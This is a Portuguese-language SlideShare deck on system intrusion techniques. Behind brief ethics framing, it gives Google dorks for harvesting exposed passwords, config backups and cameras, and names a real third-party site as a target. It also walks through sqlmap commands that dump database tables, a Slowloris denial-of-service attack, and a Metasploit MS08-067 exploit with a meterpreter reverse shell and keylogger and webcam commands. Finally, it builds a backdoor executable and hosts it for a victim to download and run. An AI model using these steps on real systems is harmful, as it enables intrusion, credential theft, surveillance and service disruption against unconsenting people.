SlideShare uma empresa Scribd logo
1 de 42
Técnicas de Invasões
em Sistemas
CienciaHacker
SUMÁRIO
• O que são?
• Por quem são usados?
• Para que servem?
• Ética Hacker
• Principais Tipos e Métodos de Ataques:
• Engenharia Social
• Google Hacking
• SQLi
• DOS & DDOS
• Exploits
• Visão no Mercado de Trabalho e a Ética Hacker
AMBIENTE DE TRABALHO
Máquinas virtuais:
- Kali Linux
- Windows XP e 7
Alvo para ataque:
- http://testphp.vulnweb.com/
O que são?
- São testes e métodos utilizados para
romper mecanismos de segurança de
um determinado alvo.
Técnicas mais utilizadas:
• SQLi/BlindSQLi
• CSS (XSS)
• CSRF
• Directory Transversal
• LFI / RFI
• Privilege Escalation
• Social Engineering
• Remote Command Execution
• Buffer Overflow
• Brute Force
Por quem são usados?
- Por Hackers
- Por Crackers
- Por Pentesters
- Por Analistas de Segurança da
Informação
Definições dos Chapéus
- White Hat (Chapéu Branco)
- Black Hat (Chapéu Preto)
- Gray Hat (Chapéu Cinza)
Ethical Hacker (Ética Hacker)
Ética Hacker é o termo que descreve os valores
morais e filosóficos na comunidade hacker. O ponto
chave da ética é o livre acesso a informações e
melhoria da qualidade de vida.
Para que servem (na visão White hat)?
- Tem finalidade de testar em determinado
alvo a qualidade de sua “segurança” a fim
de prevenir um possível ataque e
comprometimento da informação.
Engenharia Social
• Práticas utilizadas para conseguir acesso a
informações. Não é necessário nenhum equipamento
para tal, apenas um aproveito da falha humana, e para
isso é necessário somente habilidades de atuação:
persuadir, explorar a confiança das pessoas.
• Os tipos de exploração dessa técnica é através:
Pessoas
Sistemas
Engenharia Social
 1. Pessoas
• Exploração de algumas fragilidades do psicológico humano: ego,
vaidade, a vontade de ser útil...
• Técnicas utilizadas: telefonemas, e-mails falsos, vasculhação de lixo, e
até aquisição de uma nova personalidade para se passar por outra
pessoa.
• Um engenheiro social se passando pelo chefe de um departamento ou
suporte de T.I para solicitar informações de senhas e de usuários.
• Quando as vítimas passam por essa situação, elas não percebem que
estão sendo manipuladas.
1. Pessoas
2. Sistemas
Engenharia Social
 2. Sistemas
As técnicas utilizadas pelo golpista são apenas on-line, consistindo em:
• Phishing: páginas falsas desenvolvidas para capturar dados da vítima. Essas
páginas podem parecer legítimas e ter a mesma aparência de páginas já
conhecidas. Exemplo de renovação de contas de bancos, boletos falsos,
etc...
• Malwares: Links(spans) ou anexos maliciosos. Ao serem abertos, atacam
de forma silenciosa, permitindo ao golpista controle total do computador.
• Arquivos PDF ou documentos Microsoft Office infectados.
Engenharia Social
Google Hacking
• Utiliza mecanismo de busca para procurar falhas ou
informações refinadas.
• Onde podemos explorar falhas e invadir dispositivos
eletrônicos como roteadores, sites/servidores,
câmeras, impressoras, entre outros.
• Podemos buscar dados de pessoas (podendo ser
usando numa engenharia social).
• Mais da metades dos ataques são ocorrida através
deste método.
Dorks
• São “strings” utilizadas pelo motor de
busca as quais permite encontrar alvos
vulneráveis.
• Exemplo: “filetype:pdf inurl:hacking”
• intitle, allintitle
- intitle: faz uma busca no conteúdo no título
(tag title) da página.
- allintitle: quebra a regra do exemplo acima,
dizendo ao Google que todas as palavras que
seguem devem ser encontradas no title da
página (mais restrito).
Exemplo “intitle: login.php”
• inurl, allinurl
- inurl: encontra texto em uma URL.
- alliurl: funciona de maneira idêntica ao inurl mas
de forma restritiva, exibindo resultados apenas em
que todas as strings foram encontradas.
- Exemplo “inurl: admin”
• filetype
- Busca por um arquivo de determinado tipo (extensão). O
operador filetype pode ajudá-lo na busca de tipo de arquivos
específicos. Mais especificamente, podemos utilizar esse
operador para pesquisas de páginas que terminam em uma
determinada extensão.
Exemplo “filetype: xls”
• intext,allintext
- intext: localiza uma string dentro do texto de uma página.
- allintext: localiza o termo no texto da página. Utilizar o
operador allintext também pode servir como um atalho para
"encontrar esta string em qualquer lugar, exceto no title, URL e
links".
- Exemplo “intext: Dilma”
• Site
- Direciona a pesquisa para o conteúdo de um determinado site.
Apesar de ser tecnicamente uma parte da URL, o endereço (ou
nome de domínio) de um servidor pode ser mais bem
pesquisada com o operador site.
Exemplo “site:gov.br”
Google Hacking
• Buscando arquivos de anotações de senha:
# intitle:”index of /” senhas.txt
# filetype:txt + senha + com.br
# filetype:txt intext:senha
• Buscando backup de configurações de CMSs
# intext:"~~Joomla1.txt" title:"Indexof /"
Alvo interessante: http://tiagofeitosa.com/cb/
# configuration.php_ “<?phpclass Jconfig{“
# inurl:wp-config.old
# inurl:configuration.php.bkp
Google Hacking
• Invadindo impressora remota
# intitle:”Web Image Monitor” & inurl:”/mainframe.cgi”
• Buscando câmeras disponíveis na internet:
# intitle:"Live View -AXIS 211"
# inurl:"viewerframe?mode=motion“
# inurl:”/control/userimage.html”
• Buscando por arquivos de VPN
# !HOST=*.* intext:enc_UserPassword=* ext:pcf
Google Hacking
Mais dorks..
• inurl:"passes" OR inurl:"passwords" OR
inurl:"credentials" -search -download -techsupt
-git -games -gz -bypass -exe filetype:txt
@yahoo.com OR @gmail OR @hotmail
• ext:sql intext:@gmail.com intext:password
• Ataque que permite a injeção no query (banco de
dados) retornando parâmetro não validados.
Como informações de tabelas e colunas a qual
podemos extrair informações privilegiadas sendo
senhas de usuários, e-mails, cartões de créditos,
entre outras informações delicadas.
SQLi
Havij Sqlmap
SQLi
• Buscando falha de SQLi
– Manualmente
– Google Hacking
– Scanners (Nessus, Vega, Acunetix..)
SQLi (Sqlmap)
Alvo: http://testphp.vulnweb.com/artists.php?artist=1
- Buscando o Banco de dados
# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
- Buscando as Tabelas
# sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco --tables
-Buscando as Colunas
# slqmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T
Nome_da_Tabela --columns
-Extraindo os dados das Colunas
#sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T
Nome_da_Tabela –C Nome_da_Colunas ‘nome,senha,email’ --dump
DOS & DDOS
• Ataques que viabilizam emitir
diversas requisições por segundo
para um alvo sobrecarregando,
fazendo com que o serviço fique
indisponível.
Dos (Negação de Serviço)
DDos (Distribuição Dos)
Slowloris (instalação e ataque)
Baixe a ferramenta:
# wget http://ha.ckers.org/slowloris/slowloris.pl
Atribui a permissão para executa-lo.
# chmod 777 slowloris.pl
Inicie o Ataque:
# slowloris.pl -dns www.cienciahacker.cf -port 80 -timeout 5 -num 5000
-dns = indica o alvo, podendo ser um IP ou SITE
-port = Porta para o ataque.
-timeout = Tempo de espera entre cada ataque
-num = numero de pacotes.
Exploits
• Um exploit é um pedaço de software, um pedaço de
dados ou uma sequência de comandos que tomam
vantagem de um defeito, falha
ou vulnerabilidade afim de causar um comportamento
acidental ou imprevisto a ocorrer no software ou
hardware de um computador ou em algum eletrônico
(normalmente computadorizado). Tal comportamento
frequentemente inclui coisas como ganhar o controle
de um sistema de computador, permitindo elevação
de privilégio ou um ataque de negação de serviço.
Exploitando Windows XP
• Abrimos a ferramenta msfconsole.
# msfconsole
• E selecionamos o exploit a seguir:
# use windows/smb/ms08_067_netapi
• Depois disso colocaremos o IP da vítima.
# set RHOST 192.168.2.108
• Selecionamos o nosso payload a qual permite a interação entre
nós e a vítima.
# set PAYLOAD windows/meterpreter/reverse_tcp
Exploitando Windows XP
• E o nosso IP para receber a conexão.
# set LHOST 192.168.2.103
• E o comando abaixo para executar o exploit já selecionado:
# exploit
Comandos Extras:
• webcam_list,
• webcam_snap,
• shutdown -n
• screenshot
• keyscan_start
• keyscan_dump
• keyscan_stop
• shutdown -s -t 1
• sysinfo
Exploitando Windows 7 e 8
• Criamos o nosso payload com nosso ip e a porta 4444 para se comunicar com a
vitima e damos um nome a ele:
#msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444
x>name.exe
• Abrimos o msfconsole que é a nossa interface do nossos exploits a serem
usados
#msfconsole
• Agora colocamos o nosso computador em modo listening a qual deixa
esperando uma conexão com nosso payload criado.
#use exploit/multi/handler
• E agora informamos qual o nosso payload que iremos receber nessa chamada
#set payload windows/meterpreter/reverse_tcp
Exploitando Windows 7 e 8
• Depois disso colocamos o nosso IP para receber a conexão com a
vitima.
#set lhost IP
• E o comando para executar nosso exploit.
#exploit
• Agora enviamos a vítima através do Apache
#cp nome.exe /var/www
#service apache2 start
Agora só efetuar o download pelo IP do seu Apache e executar a
backdoor.
Visão no Mercado de Trabalho
• Carência de profissionais éticos
• Certificações
• Leis Cibernéticas
www.cienciahacker.com.br
www.youtube.com.br/cienciahacker
www.securityforce.org

Mais conteúdo relacionado

Mais procurados

Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall Cleber Ramos
 
Segurança da Informação e Políticas de Segurança
Segurança da Informação e Políticas de SegurançaSegurança da Informação e Políticas de Segurança
Segurança da Informação e Políticas de SegurançaGilberto Sudre
 
Ameacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfAmeacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfEdkallenn Lima
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAMaraLuizaGonalvesFre
 
Relatório de Teste Invasão fícticio
Relatório de Teste Invasão fícticioRelatório de Teste Invasão fícticio
Relatório de Teste Invasão fícticioVitor Melo
 
Desafios da cibersegurança - ontem, hoje e amanhã
Desafios da cibersegurança - ontem, hoje e amanhãDesafios da cibersegurança - ontem, hoje e amanhã
Desafios da cibersegurança - ontem, hoje e amanhãLuiz Arthur
 
Segurança da Informação
Segurança da InformaçãoSegurança da Informação
Segurança da InformaçãoFábio Ferreira
 
Ferramentas de Segurança
Ferramentas de SegurançaFerramentas de Segurança
Ferramentas de SegurançaAlefe Variani
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informaçãoEmerson Rocha
 
Livro proibido do curso de hacker completo 285 páginas 71
Livro proibido do curso de hacker completo 285 páginas 71Livro proibido do curso de hacker completo 285 páginas 71
Livro proibido do curso de hacker completo 285 páginas 71Guilherme Dias
 
Segurança da Informação
Segurança da InformaçãoSegurança da Informação
Segurança da InformaçãoMarco Mendes
 
Segurança da informação - Forense Computacional
Segurança da informação - Forense ComputacionalSegurança da informação - Forense Computacional
Segurança da informação - Forense ComputacionalJefferson Costa
 
Segurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | IptablesSegurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | IptablesMinistério Público da Paraíba
 
Conceitos básicos de segurança da informação
Conceitos básicos de segurança da informaçãoConceitos básicos de segurança da informação
Conceitos básicos de segurança da informaçãoCarlos De Carvalho
 

Mais procurados (20)

Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall Segurança de redes - Conceitos de firewall
Segurança de redes - Conceitos de firewall
 
Segurança da Informação e Políticas de Segurança
Segurança da Informação e Políticas de SegurançaSegurança da Informação e Políticas de Segurança
Segurança da Informação e Políticas de Segurança
 
Ameacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdfAmeacas ataques e Cyberseguranca básica.pdf
Ameacas ataques e Cyberseguranca básica.pdf
 
Deep web
Deep webDeep web
Deep web
 
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇAAULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
AULA 9 - INTRODUÇÃO À CIBERSEGURANÇA
 
Palestra - Segurança da Informação
Palestra - Segurança da InformaçãoPalestra - Segurança da Informação
Palestra - Segurança da Informação
 
Relatório de Teste Invasão fícticio
Relatório de Teste Invasão fícticioRelatório de Teste Invasão fícticio
Relatório de Teste Invasão fícticio
 
Desafios da cibersegurança - ontem, hoje e amanhã
Desafios da cibersegurança - ontem, hoje e amanhãDesafios da cibersegurança - ontem, hoje e amanhã
Desafios da cibersegurança - ontem, hoje e amanhã
 
Boas Práticas em Segurança da Informação
Boas Práticas em Segurança da InformaçãoBoas Práticas em Segurança da Informação
Boas Práticas em Segurança da Informação
 
Protocolo SSH
Protocolo SSHProtocolo SSH
Protocolo SSH
 
Segurança da Informação
Segurança da InformaçãoSegurança da Informação
Segurança da Informação
 
Segurança de Rede
Segurança de RedeSegurança de Rede
Segurança de Rede
 
Ferramentas de Segurança
Ferramentas de SegurançaFerramentas de Segurança
Ferramentas de Segurança
 
Segurança da informação
Segurança da informaçãoSegurança da informação
Segurança da informação
 
Livro proibido do curso de hacker completo 285 páginas 71
Livro proibido do curso de hacker completo 285 páginas 71Livro proibido do curso de hacker completo 285 páginas 71
Livro proibido do curso de hacker completo 285 páginas 71
 
Segurança da Informação
Segurança da InformaçãoSegurança da Informação
Segurança da Informação
 
Computação em nuvem
Computação em nuvemComputação em nuvem
Computação em nuvem
 
Segurança da informação - Forense Computacional
Segurança da informação - Forense ComputacionalSegurança da informação - Forense Computacional
Segurança da informação - Forense Computacional
 
Segurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | IptablesSegurança de Dados e Informações - Aula 5 - Firewall | Iptables
Segurança de Dados e Informações - Aula 5 - Firewall | Iptables
 
Conceitos básicos de segurança da informação
Conceitos básicos de segurança da informaçãoConceitos básicos de segurança da informação
Conceitos básicos de segurança da informação
 

Destaque

PHP Jedi - Boas Práticas e Alta Performance
PHP Jedi - Boas Práticas e Alta PerformancePHP Jedi - Boas Práticas e Alta Performance
PHP Jedi - Boas Práticas e Alta PerformanceFelipe Ribeiro
 
Google Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivosGoogle Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivosC H
 
Apostila para hackers iniciantes
Apostila para hackers iniciantesApostila para hackers iniciantes
Apostila para hackers iniciantesponto hacker
 
Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1ponto hacker
 
[QCon 2011] Por uma web mais rápida: técnicas de otimização de Sites
[QCon 2011] Por uma web mais rápida: técnicas de otimização de Sites[QCon 2011] Por uma web mais rápida: técnicas de otimização de Sites
[QCon 2011] Por uma web mais rápida: técnicas de otimização de SitesCaelum
 
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoRedes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoHeber Gutenberg
 
Livro Aberto Aprendendo a Programar na Linguagem C
Livro Aberto Aprendendo a Programar na Linguagem CLivro Aberto Aprendendo a Programar na Linguagem C
Livro Aberto Aprendendo a Programar na Linguagem CMarcos Quinho
 
5ª ed introdução organização de computadores mario a. monteiro
5ª ed introdução organização de computadores   mario a. monteiro5ª ed introdução organização de computadores   mario a. monteiro
5ª ed introdução organização de computadores mario a. monteiroAdriana Carvalho
 
Metasploit
MetasploitMetasploit
Metasploitninguna
 
Introdução a estrutura de dados josé lucas rangel - raulzinho.cb@hotmail.com
Introdução a estrutura de dados   josé lucas rangel - raulzinho.cb@hotmail.comIntrodução a estrutura de dados   josé lucas rangel - raulzinho.cb@hotmail.com
Introdução a estrutura de dados josé lucas rangel - raulzinho.cb@hotmail.comRaul Batalha
 
Sistemas de informações gerenciais kenneth c. laudon - jane p
Sistemas de informações gerenciais   kenneth c. laudon - jane pSistemas de informações gerenciais   kenneth c. laudon - jane p
Sistemas de informações gerenciais kenneth c. laudon - jane pTarciso Ferreira
 
Fundamentos da programação de computadores 2ª edição
Fundamentos da programação de computadores   2ª ediçãoFundamentos da programação de computadores   2ª edição
Fundamentos da programação de computadores 2ª ediçãoLeandro Rocha de Oliveira
 
Apostila para hackers iniciantes
Apostila para hackers iniciantesApostila para hackers iniciantes
Apostila para hackers inicianteshackersetruques
 
Apresentação MCTI sobre estratégia nacional 2012 2015 ct&i
Apresentação MCTI sobre estratégia nacional 2012 2015 ct&iApresentação MCTI sobre estratégia nacional 2012 2015 ct&i
Apresentação MCTI sobre estratégia nacional 2012 2015 ct&iDenizecomZ
 
Art as matérias primas cerâmicas. parte i o perfil das princip
Art  as matérias primas cerâmicas. parte i o perfil das principArt  as matérias primas cerâmicas. parte i o perfil das princip
Art as matérias primas cerâmicas. parte i o perfil das principPetiano Camilo Bin
 
1 o hacker profissional
1   o hacker profissional1   o hacker profissional
1 o hacker profissionaljohn luys
 

Destaque (20)

teste de invasão
teste de invasãoteste de invasão
teste de invasão
 
Metodos de invasao
Metodos de invasaoMetodos de invasao
Metodos de invasao
 
Apostila metasploit
Apostila metasploitApostila metasploit
Apostila metasploit
 
PHP Jedi - Boas Práticas e Alta Performance
PHP Jedi - Boas Práticas e Alta PerformancePHP Jedi - Boas Práticas e Alta Performance
PHP Jedi - Boas Práticas e Alta Performance
 
Google Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivosGoogle Hacking - Explorando falhas de dispotivos
Google Hacking - Explorando falhas de dispotivos
 
Apostila para hackers iniciantes
Apostila para hackers iniciantesApostila para hackers iniciantes
Apostila para hackers iniciantes
 
Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1Técnicas hacker soluções para segurança 1
Técnicas hacker soluções para segurança 1
 
[QCon 2011] Por uma web mais rápida: técnicas de otimização de Sites
[QCon 2011] Por uma web mais rápida: técnicas de otimização de Sites[QCon 2011] Por uma web mais rápida: técnicas de otimização de Sites
[QCon 2011] Por uma web mais rápida: técnicas de otimização de Sites
 
Introdução a HTML, CSS, JS, Ajax
Introdução a HTML, CSS, JS, AjaxIntrodução a HTML, CSS, JS, Ajax
Introdução a HTML, CSS, JS, Ajax
 
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. MorimotoRedes e Servidores Linux - Guia Prático - Carlos E. Morimoto
Redes e Servidores Linux - Guia Prático - Carlos E. Morimoto
 
Livro Aberto Aprendendo a Programar na Linguagem C
Livro Aberto Aprendendo a Programar na Linguagem CLivro Aberto Aprendendo a Programar na Linguagem C
Livro Aberto Aprendendo a Programar na Linguagem C
 
5ª ed introdução organização de computadores mario a. monteiro
5ª ed introdução organização de computadores   mario a. monteiro5ª ed introdução organização de computadores   mario a. monteiro
5ª ed introdução organização de computadores mario a. monteiro
 
Metasploit
MetasploitMetasploit
Metasploit
 
Introdução a estrutura de dados josé lucas rangel - raulzinho.cb@hotmail.com
Introdução a estrutura de dados   josé lucas rangel - raulzinho.cb@hotmail.comIntrodução a estrutura de dados   josé lucas rangel - raulzinho.cb@hotmail.com
Introdução a estrutura de dados josé lucas rangel - raulzinho.cb@hotmail.com
 
Sistemas de informações gerenciais kenneth c. laudon - jane p
Sistemas de informações gerenciais   kenneth c. laudon - jane pSistemas de informações gerenciais   kenneth c. laudon - jane p
Sistemas de informações gerenciais kenneth c. laudon - jane p
 
Fundamentos da programação de computadores 2ª edição
Fundamentos da programação de computadores   2ª ediçãoFundamentos da programação de computadores   2ª edição
Fundamentos da programação de computadores 2ª edição
 
Apostila para hackers iniciantes
Apostila para hackers iniciantesApostila para hackers iniciantes
Apostila para hackers iniciantes
 
Apresentação MCTI sobre estratégia nacional 2012 2015 ct&i
Apresentação MCTI sobre estratégia nacional 2012 2015 ct&iApresentação MCTI sobre estratégia nacional 2012 2015 ct&i
Apresentação MCTI sobre estratégia nacional 2012 2015 ct&i
 
Art as matérias primas cerâmicas. parte i o perfil das princip
Art  as matérias primas cerâmicas. parte i o perfil das principArt  as matérias primas cerâmicas. parte i o perfil das princip
Art as matérias primas cerâmicas. parte i o perfil das princip
 
1 o hacker profissional
1   o hacker profissional1   o hacker profissional
1 o hacker profissional
 

Semelhante a Técnicas de invasão em sistemas

Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesBruno Alexandre
 
Aula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesAula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesCarlos Veiga
 
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Marcelo Area Leao
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Roberto Soares
 
Rede mundial de computadores
Rede mundial de computadoresRede mundial de computadores
Rede mundial de computadoresRodrigo Motta
 
Introdução à Segurança da Informação
Introdução à Segurança da InformaçãoIntrodução à Segurança da Informação
Introdução à Segurança da InformaçãoVinicius Marangoni
 
Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoCleórbete Santos
 
Pentest Invasão e Defesa - AnonFeh
Pentest   Invasão e Defesa - AnonFehPentest   Invasão e Defesa - AnonFeh
Pentest Invasão e Defesa - AnonFehPhillipe Martins
 
Invasão e correção em sites
Invasão e correção em sitesInvasão e correção em sites
Invasão e correção em sitesDaskonet Dasko
 
Gov vs Hacker, como and os *.gov.br - Usando php avenger
Gov vs Hacker, como and os *.gov.br - Usando php avengerGov vs Hacker, como and os *.gov.br - Usando php avenger
Gov vs Hacker, como and os *.gov.br - Usando php avengerLenon Leite
 
SQL Server ES - Visão geral sobre segurança
SQL Server ES - Visão geral sobre segurançaSQL Server ES - Visão geral sobre segurança
SQL Server ES - Visão geral sobre segurançaDirceu Resende
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesAlisson Fuckner
 

Semelhante a Técnicas de invasão em sistemas (20)

Palestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de RedesPalestra: Pentest - Intrusão de Redes
Palestra: Pentest - Intrusão de Redes
 
Pentest conisli07
Pentest conisli07Pentest conisli07
Pentest conisli07
 
Aula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de AtaquesAula03 – Códigos Maliciosos e Tipos de Ataques
Aula03 – Códigos Maliciosos e Tipos de Ataques
 
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
Pentest invasoedefesa-anonfeh-130416201153-phpapp01 (1)
 
Invasão e Segurança
Invasão e SegurançaInvasão e Segurança
Invasão e Segurança
 
Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"Slide Palestra "Metasploit Framework"
Slide Palestra "Metasploit Framework"
 
H2HC University 2014
H2HC University 2014H2HC University 2014
H2HC University 2014
 
Rede mundial de computadores
Rede mundial de computadoresRede mundial de computadores
Rede mundial de computadores
 
Aula 8.0 - Segurança
Aula 8.0 - SegurançaAula 8.0 - Segurança
Aula 8.0 - Segurança
 
Teste de segurança do lado servidor - Nível 1
Teste de segurança do lado servidor - Nível 1Teste de segurança do lado servidor - Nível 1
Teste de segurança do lado servidor - Nível 1
 
Aula de seguranca (1)
Aula de seguranca (1)Aula de seguranca (1)
Aula de seguranca (1)
 
Introdução à Segurança da Informação
Introdução à Segurança da InformaçãoIntrodução à Segurança da Informação
Introdução à Segurança da Informação
 
Ethical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetraçãoEthical hacking: Conceitos básicos de Testes de penetração
Ethical hacking: Conceitos básicos de Testes de penetração
 
Pentest Invasão e Defesa - AnonFeh
Pentest   Invasão e Defesa - AnonFehPentest   Invasão e Defesa - AnonFeh
Pentest Invasão e Defesa - AnonFeh
 
Invasão e correção em sites
Invasão e correção em sitesInvasão e correção em sites
Invasão e correção em sites
 
Invasao_e_Correcao_em_Sites.pdf
Invasao_e_Correcao_em_Sites.pdfInvasao_e_Correcao_em_Sites.pdf
Invasao_e_Correcao_em_Sites.pdf
 
Gov vs Hacker, como and os *.gov.br - Usando php avenger
Gov vs Hacker, como and os *.gov.br - Usando php avengerGov vs Hacker, como and os *.gov.br - Usando php avenger
Gov vs Hacker, como and os *.gov.br - Usando php avenger
 
Automatizando Nmap com NSE
Automatizando Nmap com NSEAutomatizando Nmap com NSE
Automatizando Nmap com NSE
 
SQL Server ES - Visão geral sobre segurança
SQL Server ES - Visão geral sobre segurançaSQL Server ES - Visão geral sobre segurança
SQL Server ES - Visão geral sobre segurança
 
Introdução ao teste de intrusão em redes
Introdução ao teste de intrusão em redesIntrodução ao teste de intrusão em redes
Introdução ao teste de intrusão em redes
 

Técnicas de invasão em sistemas

  • 1. Técnicas de Invasões em Sistemas CienciaHacker
  • 2. SUMÁRIO • O que são? • Por quem são usados? • Para que servem? • Ética Hacker • Principais Tipos e Métodos de Ataques: • Engenharia Social • Google Hacking • SQLi • DOS & DDOS • Exploits • Visão no Mercado de Trabalho e a Ética Hacker
  • 3. AMBIENTE DE TRABALHO Máquinas virtuais: - Kali Linux - Windows XP e 7 Alvo para ataque: - http://testphp.vulnweb.com/
  • 4. O que são? - São testes e métodos utilizados para romper mecanismos de segurança de um determinado alvo.
  • 5. Técnicas mais utilizadas: • SQLi/BlindSQLi • CSS (XSS) • CSRF • Directory Transversal • LFI / RFI • Privilege Escalation • Social Engineering • Remote Command Execution • Buffer Overflow • Brute Force
  • 6. Por quem são usados? - Por Hackers - Por Crackers - Por Pentesters - Por Analistas de Segurança da Informação
  • 7.
  • 8. Definições dos Chapéus - White Hat (Chapéu Branco) - Black Hat (Chapéu Preto) - Gray Hat (Chapéu Cinza)
  • 9. Ethical Hacker (Ética Hacker) Ética Hacker é o termo que descreve os valores morais e filosóficos na comunidade hacker. O ponto chave da ética é o livre acesso a informações e melhoria da qualidade de vida.
  • 10. Para que servem (na visão White hat)? - Tem finalidade de testar em determinado alvo a qualidade de sua “segurança” a fim de prevenir um possível ataque e comprometimento da informação.
  • 11.
  • 12. Engenharia Social • Práticas utilizadas para conseguir acesso a informações. Não é necessário nenhum equipamento para tal, apenas um aproveito da falha humana, e para isso é necessário somente habilidades de atuação: persuadir, explorar a confiança das pessoas. • Os tipos de exploração dessa técnica é através: Pessoas Sistemas
  • 13. Engenharia Social  1. Pessoas • Exploração de algumas fragilidades do psicológico humano: ego, vaidade, a vontade de ser útil... • Técnicas utilizadas: telefonemas, e-mails falsos, vasculhação de lixo, e até aquisição de uma nova personalidade para se passar por outra pessoa. • Um engenheiro social se passando pelo chefe de um departamento ou suporte de T.I para solicitar informações de senhas e de usuários. • Quando as vítimas passam por essa situação, elas não percebem que estão sendo manipuladas. 1. Pessoas 2. Sistemas
  • 14. Engenharia Social  2. Sistemas As técnicas utilizadas pelo golpista são apenas on-line, consistindo em: • Phishing: páginas falsas desenvolvidas para capturar dados da vítima. Essas páginas podem parecer legítimas e ter a mesma aparência de páginas já conhecidas. Exemplo de renovação de contas de bancos, boletos falsos, etc... • Malwares: Links(spans) ou anexos maliciosos. Ao serem abertos, atacam de forma silenciosa, permitindo ao golpista controle total do computador. • Arquivos PDF ou documentos Microsoft Office infectados.
  • 16. Google Hacking • Utiliza mecanismo de busca para procurar falhas ou informações refinadas. • Onde podemos explorar falhas e invadir dispositivos eletrônicos como roteadores, sites/servidores, câmeras, impressoras, entre outros. • Podemos buscar dados de pessoas (podendo ser usando numa engenharia social). • Mais da metades dos ataques são ocorrida através deste método.
  • 17. Dorks • São “strings” utilizadas pelo motor de busca as quais permite encontrar alvos vulneráveis. • Exemplo: “filetype:pdf inurl:hacking”
  • 18. • intitle, allintitle - intitle: faz uma busca no conteúdo no título (tag title) da página. - allintitle: quebra a regra do exemplo acima, dizendo ao Google que todas as palavras que seguem devem ser encontradas no title da página (mais restrito). Exemplo “intitle: login.php”
  • 19. • inurl, allinurl - inurl: encontra texto em uma URL. - alliurl: funciona de maneira idêntica ao inurl mas de forma restritiva, exibindo resultados apenas em que todas as strings foram encontradas. - Exemplo “inurl: admin”
  • 20. • filetype - Busca por um arquivo de determinado tipo (extensão). O operador filetype pode ajudá-lo na busca de tipo de arquivos específicos. Mais especificamente, podemos utilizar esse operador para pesquisas de páginas que terminam em uma determinada extensão. Exemplo “filetype: xls”
  • 21. • intext,allintext - intext: localiza uma string dentro do texto de uma página. - allintext: localiza o termo no texto da página. Utilizar o operador allintext também pode servir como um atalho para "encontrar esta string em qualquer lugar, exceto no title, URL e links". - Exemplo “intext: Dilma”
  • 22. • Site - Direciona a pesquisa para o conteúdo de um determinado site. Apesar de ser tecnicamente uma parte da URL, o endereço (ou nome de domínio) de um servidor pode ser mais bem pesquisada com o operador site. Exemplo “site:gov.br”
  • 23. Google Hacking • Buscando arquivos de anotações de senha: # intitle:”index of /” senhas.txt # filetype:txt + senha + com.br # filetype:txt intext:senha • Buscando backup de configurações de CMSs # intext:"~~Joomla1.txt" title:"Indexof /" Alvo interessante: http://tiagofeitosa.com/cb/ # configuration.php_ “<?phpclass Jconfig{“ # inurl:wp-config.old # inurl:configuration.php.bkp
